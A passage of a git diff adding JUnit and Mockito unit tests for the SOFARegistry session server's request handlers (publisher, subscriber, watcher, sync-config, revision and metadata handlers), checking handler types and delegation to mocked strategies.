org.mockito.Mockito.when; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.dataserver.DatumSummary; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffPublisherRequest; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffPublisherResult; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.bootstrap.ExecutorManager; +import com.alipay.sofa.registry.server.session.slot.SlotTableCache; +import com.alipay.sofa.registry.server.session.store.DataStore; +import java.util.Collections; +import java.util.List; +import org.junit.Assert; +import org.junit.Test; + +public class DataSlotDiffPublisherRequestHandlerTest { + @Test + public void testCheckParam() { + DataSlotDiffPublisherRequestHandler handler = newHandler(); + handler.checkParam(request(1, null)); + handler.checkParam(request(1, Collections.emptyList())); + } + + private DataSlotDiffPublisherRequestHandler newHandler() { + DataSlotDiffPublisherRequestHandler handler = new DataSlotDiffPublisherRequestHandler(); + handler.executorManager = new ExecutorManager(TestUtils.newSessionConfig("testDc")); + Assert.assertNotNull(handler.getExecutor()); + Assert.assertEquals(handler.interest(), DataSlotDiffPublisherRequest.class); + Assert.assertEquals(handler.getConnectNodeType(), Node.NodeType.DATA); + Assert.assertEquals(handler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(handler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + GenericResponse failed = (GenericResponse) handler.buildFailedResponse("msg"); + Assert.assertFalse(failed.isSuccess()); + return handler; + } + + @Test + public void testHandle() { + DataSlotDiffPublisherRequestHandler handler = newHandler(); + handler.slotTableCache = mock(SlotTableCache.class); + handler.sessionServerConfig = TestUtils.newSessionConfig("testDc"); + + TestUtils.MockBlotChannel channel = TestUtils.newChannel(9620, "localhost", 8888); + + DataSlotDiffPublisherRequest request = request(1, Collections.emptyList()); + + // npe + GenericResponse resp = (GenericResponse) handler.doHandle(channel, request); + Assert.assertFalse(resp.isSuccess()); + Assert.assertNull(resp.getData()); + + handler.sessionDataStore = mock(DataStore.class); + when(handler.sessionDataStore.getDataInfoIdPublishers(anyInt())) + .thenReturn(Collections.emptyMap()); + resp = (GenericResponse) handler.doHandle(channel, request); + Assert.assertTrue(resp.isSuccess()); + Assert.assertNotNull(resp.getData()); + Assert.assertTrue(resp.getData() instanceof DataSlotDiffPublisherResult); + } + + private static DataSlotDiffPublisherRequest request(int slotId, List summaries) { + return new DataSlotDiffPublisherRequest(1, slotId, summaries); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/GetRevisionPbHandlerTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/GetRevisionPbHandlerTest.java new file mode 100644 index 000000000..2e7676dc8 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/GetRevisionPbHandlerTest.java @@ -0,0 +1,62 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.bootstrap.ExecutorManager; +import com.alipay.sofa.registry.server.session.strategy.AppRevisionHandlerStrategy; +import org.junit.Assert; +import org.junit.Test; + +public class GetRevisionPbHandlerTest { + @Test + public void testCheckParam() { + GetRevisionPbHandler handler = newHandler(); + handler.checkParam(request()); + } + + private GetRevisionPbHandler newHandler() { + GetRevisionPbHandler handler = new GetRevisionPbHandler(); + handler.executorManager = new ExecutorManager(TestUtils.newSessionConfig("testDc")); + Assert.assertNotNull(handler.getExecutor()); + Assert.assertEquals(handler.interest(), GetRevisionsRequest.class); + Assert.assertEquals(handler.getConnectNodeType(), Node.NodeType.CLIENT); + Assert.assertEquals(handler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(handler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + handler.appRevisionHandlerStrategy = mock(AppRevisionHandlerStrategy.class); + return handler; + } + + @Test + public void testHandle() { + GetRevisionPbHandler handler = newHandler(); + + handler.doHandle(null, request()); + verify(handler.appRevisionHandlerStrategy, times(1)).queryRevision(anyList()); + } + + private static GetRevisionsRequest request() { + GetRevisionsRequest.Builder builder = GetRevisionsRequest.newBuilder(); + builder.addRevisions("testRevision"); + return builder.build(); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/MetaRevisionHeartbeatPbHandlerTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/MetaRevisionHeartbeatPbHandlerTest.java new file mode 100644 index 000000000..5b59050ec --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/MetaRevisionHeartbeatPbHandlerTest.java @@ -0,0 +1,63 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import static org.mockito.Matchers.anyList; +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatRequest; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.bootstrap.ExecutorManager; +import com.alipay.sofa.registry.server.session.strategy.AppRevisionHandlerStrategy; +import org.junit.Assert; +import org.junit.Test; + +public class MetaRevisionHeartbeatPbHandlerTest { + @Test + public void testCheckParam() { + MetaRevisionHeartbeatPbHandler handler = newHandler(); + handler.checkParam(request()); + } + + private MetaRevisionHeartbeatPbHandler newHandler() { + MetaRevisionHeartbeatPbHandler handler = new MetaRevisionHeartbeatPbHandler(); + handler.executorManager = new ExecutorManager(TestUtils.newSessionConfig("testDc")); + Assert.assertNotNull(handler.getExecutor()); + Assert.assertEquals(handler.interest(), MetaHeartbeatRequest.class); + Assert.assertEquals(handler.getConnectNodeType(), Node.NodeType.CLIENT); + Assert.assertEquals(handler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(handler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + handler.appRevisionHandlerStrategy = mock(AppRevisionHandlerStrategy.class); + return handler; + } + + @Test + public void testHandle() { + MetaRevisionHeartbeatPbHandler handler = newHandler(); + + handler.doHandle(null, request()); + verify(handler.appRevisionHandlerStrategy, times(1)).heartbeat(anyList()); + } + + private static MetaHeartbeatRequest request() { + MetaHeartbeatRequest.Builder builder = MetaHeartbeatRequest.newBuilder(); + builder.addRevisions("testRevision"); + return builder.build(); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/MetadataRegisterPbHandlerTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/MetadataRegisterPbHandlerTest.java new file mode 100644 index 000000000..d5f557297 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/MetadataRegisterPbHandlerTest.java @@ -0,0 +1,58 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.client.pb.MetaRegister; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.bootstrap.ExecutorManager; +import com.alipay.sofa.registry.server.session.strategy.AppRevisionHandlerStrategy; +import org.junit.Assert; +import org.junit.Test; + +public class MetadataRegisterPbHandlerTest { + + private MetadataRegisterPbHandler newHandler() { + MetadataRegisterPbHandler handler = new MetadataRegisterPbHandler(); + handler.executorManager = new ExecutorManager(TestUtils.newSessionConfig("testDc")); + Assert.assertNotNull(handler.getExecutor()); + Assert.assertEquals(handler.interest(), MetaRegister.class); + Assert.assertEquals(handler.getConnectNodeType(), Node.NodeType.CLIENT); + Assert.assertEquals(handler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(handler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + handler.appRevisionHandlerStrategy = mock(AppRevisionHandlerStrategy.class); + return handler; + } + + @Test + public void testHandle() { + MetadataRegisterPbHandler handler = newHandler(); + + handler.doHandle(null, request()); + verify(handler.appRevisionHandlerStrategy, times(1)) + .handleAppRevisionRegister(anyObject(), anyObject()); + } + + private static MetaRegister request() { + MetaRegister.Builder builder = MetaRegister.newBuilder(); + builder.setApplication("testApplication"); + return builder.build(); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/NotifyProvideDataChangeHandlerTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/NotifyProvideDataChangeHandlerTest.java new file mode 100644 index 000000000..bdb2afe62 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/NotifyProvideDataChangeHandlerTest.java @@ -0,0 +1,67 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import static org.mockito.Matchers.anyLong; +import static org.mockito.Matchers.anyString; +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.metaserver.ProvideDataChangeEvent; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.server.session.store.Watchers; +import com.alipay.sofa.registry.task.listener.TaskListenerManager; +import java.util.concurrent.LinkedBlockingQueue; +import java.util.concurrent.ThreadPoolExecutor; +import java.util.concurrent.TimeUnit; +import org.junit.Assert; +import org.junit.Test; + +public class NotifyProvideDataChangeHandlerTest { + + private NotifyProvideDataChangeHandler newHandler() { + NotifyProvideDataChangeHandler handler = new NotifyProvideDataChangeHandler(); + handler.metaNodeExecutor = + new ThreadPoolExecutor(10, 10, 10, TimeUnit.MINUTES, new LinkedBlockingQueue<>()); + Assert.assertNotNull(handler.getExecutor()); + Assert.assertEquals(handler.interest(), ProvideDataChangeEvent.class); + Assert.assertEquals(handler.getConnectNodeType(), Node.NodeType.META); + Assert.assertEquals(handler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(handler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + return handler; + } + + @Test + public void testHandle() { + NotifyProvideDataChangeHandler handler = newHandler(); + handler.sessionWatchers = mock(Watchers.class); + handler.taskListenerManager = mock(TaskListenerManager.class); + Assert.assertNull(handler.doHandle(null, request(ValueConstants.BLACK_LIST_DATA_ID))); + verify(handler.sessionWatchers, times(0)).checkWatcherVersions(anyString(), anyLong()); + verify(handler.taskListenerManager, times(1)).sendTaskEvent(anyObject()); + + // not match system.provideData and not watch + handler.doHandle(null, request("testDataInfoId")); + verify(handler.sessionWatchers, times(1)).checkWatcherVersions(anyString(), anyLong()); + verify(handler.taskListenerManager, times(1)).sendTaskEvent(anyObject()); + } + + private static ProvideDataChangeEvent request(String dataInfoId) { + return new ProvideDataChangeEvent(dataInfoId, 10); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/PublisherHandlerTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/PublisherHandlerTest.java new file mode 100644 index 000000000..1cb2559ad --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/PublisherHandlerTest.java @@ -0,0 +1,79 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb; +import com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb; +import com.alipay.sofa.registry.core.model.PublisherRegister; +import com.alipay.sofa.registry.core.model.RegisterResponse; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.bootstrap.ExecutorManager; +import com.alipay.sofa.registry.server.session.strategy.PublisherHandlerStrategy; +import org.junit.Assert; +import org.junit.Test; + +public class PublisherHandlerTest { + + private PublisherHandler newHandler() { + PublisherHandler handler = new PublisherHandler(); + handler.executorManager = new ExecutorManager(TestUtils.newSessionConfig("testDc")); + Assert.assertNotNull(handler.getExecutor()); + Assert.assertEquals(handler.interest(), PublisherRegister.class); + Assert.assertEquals(handler.getConnectNodeType(), Node.NodeType.CLIENT); + Assert.assertEquals(handler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(handler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + handler.publisherHandlerStrategy = mock(PublisherHandlerStrategy.class); + return handler; + } + + @Test + public void testHandle() { + PublisherHandler handler = newHandler(); + + RegisterResponse response = (RegisterResponse) handler.doHandle(null, request()); + Assert.assertFalse(response.isSuccess()); + verify(handler.publisherHandlerStrategy, times(1)) + .handlePublisherRegister(anyObject(), anyObject(), any()); + } + + @Test + public void testPb() { + PublisherPbHandler pbHandler = new PublisherPbHandler(); + pbHandler.publisherHandler = newHandler(); + Assert.assertNotNull(pbHandler.getExecutor()); + Assert.assertEquals(pbHandler.interest(), PublisherRegisterPb.class); + Assert.assertEquals(pbHandler.getConnectNodeType(), Node.NodeType.CLIENT); + Assert.assertEquals(pbHandler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(pbHandler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + PublisherRegisterPb pb = PublisherRegisterPb.newBuilder().build(); + // illegal handle + RegisterResponsePb responsePb = (RegisterResponsePb) pbHandler.doHandle(null, pb); + Assert.assertFalse(responsePb.getSuccess()); + + verify(pbHandler.publisherHandler.publisherHandlerStrategy, times(1)) + .handlePublisherRegister(anyObject(), anyObject(), any()); + } + + private static PublisherRegister request() { + PublisherRegister register = new PublisherRegister(); + return register; + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/ServiceAppMappingPbHandlerTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/ServiceAppMappingPbHandlerTest.java new file mode 100644 index 000000000..6d001abe3 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/ServiceAppMappingPbHandlerTest.java @@ -0,0 +1,63 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import static org.mockito.Matchers.anyList; +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingRequest; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.bootstrap.ExecutorManager; +import com.alipay.sofa.registry.server.session.strategy.AppRevisionHandlerStrategy; +import org.junit.Assert; +import org.junit.Test; + +public class ServiceAppMappingPbHandlerTest { + @Test + public void testCheckParam() { + ServiceAppMappingPbHandler handler = newHandler(); + handler.checkParam(request()); + } + + private ServiceAppMappingPbHandler newHandler() { + ServiceAppMappingPbHandler handler = new ServiceAppMappingPbHandler(); + handler.executorManager = new ExecutorManager(TestUtils.newSessionConfig("testDc")); + Assert.assertNotNull(handler.getExecutor()); + Assert.assertEquals(handler.interest(), ServiceAppMappingRequest.class); + Assert.assertEquals(handler.getConnectNodeType(), Node.NodeType.CLIENT); + Assert.assertEquals(handler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(handler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + handler.appRevisionHandlerStrategy = mock(AppRevisionHandlerStrategy.class); + return handler; + } + + @Test + public void testHandle() { + ServiceAppMappingPbHandler handler = newHandler(); + + handler.doHandle(null, request()); + verify(handler.appRevisionHandlerStrategy, times(1)).queryApps(anyList()); + } + + private static ServiceAppMappingRequest request() { + ServiceAppMappingRequest.Builder builder = ServiceAppMappingRequest.newBuilder(); + builder.addServiceIds("testServiceIds"); + return builder.build(); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/SubscriberHandlerTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/SubscriberHandlerTest.java new file mode 100644 index 000000000..bded38b85 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/SubscriberHandlerTest.java @@ -0,0 +1,92 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import static org.mockito.Mockito.*; + +import com.alipay.remoting.BizContext; +import com.alipay.remoting.DefaultBizContext; +import com.alipay.remoting.InvokeContext; +import com.alipay.remoting.RemotingContext; +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb; +import com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb; +import com.alipay.sofa.registry.core.model.RegisterResponse; +import com.alipay.sofa.registry.core.model.SubscriberRegister; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.remoting.bolt.serializer.ProtobufSerializer; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.bootstrap.ExecutorManager; +import com.alipay.sofa.registry.server.session.strategy.SubscriberHandlerStrategy; +import java.util.concurrent.ConcurrentHashMap; +import org.junit.Assert; +import org.junit.Test; + +public class SubscriberHandlerTest { + + private SubscriberHandler newHandler() { + SubscriberHandler handler = new SubscriberHandler(); + handler.executorManager = new ExecutorManager(TestUtils.newSessionConfig("testDc")); + Assert.assertNotNull(handler.getExecutor()); + Assert.assertEquals(handler.interest(), SubscriberRegister.class); + Assert.assertEquals(handler.getConnectNodeType(), Node.NodeType.CLIENT); + Assert.assertEquals(handler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(handler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + handler.subscriberHandlerStrategy = mock(SubscriberHandlerStrategy.class); + return handler; + } + + @Test + public void testHandle() { + SubscriberHandler handler = newHandler(); + + RegisterResponse response = (RegisterResponse) handler.doHandle(null, request()); + Assert.assertFalse(response.isSuccess()); + verify(handler.subscriberHandlerStrategy, times(1)) + .handleSubscriberRegister(anyObject(), anyObject(), any()); + } + + @Test + public void testPb() { + SubscriberPbHandler pbHandler = new SubscriberPbHandler(); + pbHandler.subscriberHandler = newHandler(); + Assert.assertNotNull(pbHandler.getExecutor()); + Assert.assertEquals(pbHandler.interest(), SubscriberRegisterPb.class); + Assert.assertEquals(pbHandler.getConnectNodeType(), Node.NodeType.CLIENT); + Assert.assertEquals(pbHandler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(pbHandler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + SubscriberRegisterPb pb = SubscriberRegisterPb.newBuilder().build(); + TestUtils.MockBlotChannel channel = TestUtils.newChannel(9600, "127.0.0.1", 9888); + RemotingContext ctx = + new RemotingContext(null, new InvokeContext(), true, new ConcurrentHashMap<>()); + BizContext context = new DefaultBizContext(ctx); + channel.setBizContext(context); + // not RegisterResponse + RegisterResponsePb responsePb = (RegisterResponsePb) pbHandler.doHandle(channel, pb); + Assert.assertFalse(responsePb.getSuccess()); + verify(pbHandler.subscriberHandler.subscriberHandlerStrategy, times(1)) + .handleSubscriberRegister(anyObject(), anyObject(), any()); + Assert.assertEquals( + ctx.getInvokeContext().get(InvokeContext.BOLT_CUSTOM_SERIALIZER), + new Byte(ProtobufSerializer.PROTOCOL_PROTOBUF)); + } + + private static SubscriberRegister request() { + SubscriberRegister register = new SubscriberRegister(); + return register; + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/SyncConfigHandlerTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/SyncConfigHandlerTest.java new file mode 100644 index 000000000..b177d0dfc --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/SyncConfigHandlerTest.java @@ -0,0 +1,78 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb; +import com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb; +import com.alipay.sofa.registry.core.model.SyncConfigRequest; +import com.alipay.sofa.registry.core.model.SyncConfigResponse; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.bootstrap.ExecutorManager; +import com.alipay.sofa.registry.server.session.strategy.impl.DefaultSyncConfigHandlerStrategy; +import org.junit.Assert; +import org.junit.Test; + +public class SyncConfigHandlerTest { + + private SyncConfigHandler newHandler() { + SyncConfigHandler handler = new SyncConfigHandler(); + handler.executorManager = new ExecutorManager(TestUtils.newSessionConfig("testDc")); + Assert.assertNotNull(handler.getExecutor()); + Assert.assertEquals(handler.interest(), SyncConfigRequest.class); + Assert.assertEquals(handler.getConnectNodeType(), Node.NodeType.CLIENT); + Assert.assertEquals(handler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(handler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + handler.syncConfigHandlerStrategy = new DefaultSyncConfigHandlerStrategy(); + return handler; + } + + @Test + public void testHandle() { + SyncConfigHandler handler = newHandler(); + // always true + SyncConfigResponse response = (SyncConfigResponse) handler.doHandle(null, request()); + Assert.assertTrue(response.isSuccess()); + } + + @Test + public void testPbFail() { + SyncConfigResponsePb pb = SyncConfigPbHandler.fail(); + Assert.assertFalse(pb.getResult().getSuccess()); + } + + @Test + public void testPb() { + SyncConfigPbHandler pbHandler = new SyncConfigPbHandler(); + pbHandler.syncConfigHandler = newHandler(); + Assert.assertNotNull(pbHandler.getExecutor()); + Assert.assertEquals(pbHandler.interest(), SyncConfigRequestPb.class); + Assert.assertEquals(pbHandler.getConnectNodeType(), Node.NodeType.CLIENT); + Assert.assertEquals(pbHandler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(pbHandler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + SyncConfigRequestPb pb = SyncConfigRequestPb.newBuilder().build(); + // always true + SyncConfigResponsePb responsePb = (SyncConfigResponsePb) pbHandler.doHandle(null, pb); + Assert.assertTrue(responsePb.getResult().getSuccess()); + } + + private static SyncConfigRequest request() { + SyncConfigRequest register = new SyncConfigRequest(); + return register; + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/WatcherHandlerTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/WatcherHandlerTest.java new file mode 100644 index 000000000..1427304bc --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/WatcherHandlerTest.java @@ -0,0 +1,61 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import static org.mockito.Matchers.any; +import static org.mockito.Matchers.anyObject; +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.core.model.ConfiguratorRegister; +import com.alipay.sofa.registry.core.model.RegisterResponse; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.bootstrap.ExecutorManager; +import com.alipay.sofa.registry.server.session.strategy.WatcherHandlerStrategy; +import org.junit.Assert; +import org.junit.Test; + +public class WatcherHandlerTest { + + private WatcherHandler newHandler() { + WatcherHandler handler = new WatcherHandler(); + handler.executorManager = new ExecutorManager(TestUtils.newSessionConfig("testDc")); + Assert.assertNotNull(handler.getExecutor()); + Assert.assertEquals(handler.interest(), ConfiguratorRegister.class); + Assert.assertEquals(handler.getConnectNodeType(), Node.NodeType.CLIENT); + Assert.assertEquals(handler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(handler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + handler.watcherHandlerStrategy = mock(WatcherHandlerStrategy.class); + return handler; + } + + @Test + public void testHandle() { + WatcherHandler handler = newHandler(); + + RegisterResponse response = (RegisterResponse) handler.doHandle(null, request()); + Assert.assertFalse(response.isSuccess()); + verify(handler.watcherHandlerStrategy, times(1)) + .handleConfiguratorRegister(anyObject(), anyObject(), any()); + } + + private static ConfiguratorRegister request() { + ConfiguratorRegister register = new ConfiguratorRegister(); + return register; + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/scheduler/timertask/CacheTaskTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/scheduler/timertask/CacheTaskTest.java new file mode 100644 index 000000000..195c7284b --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/scheduler/timertask/CacheTaskTest.java @@ -0,0 +1,143 @@ +/* + * Licensed to 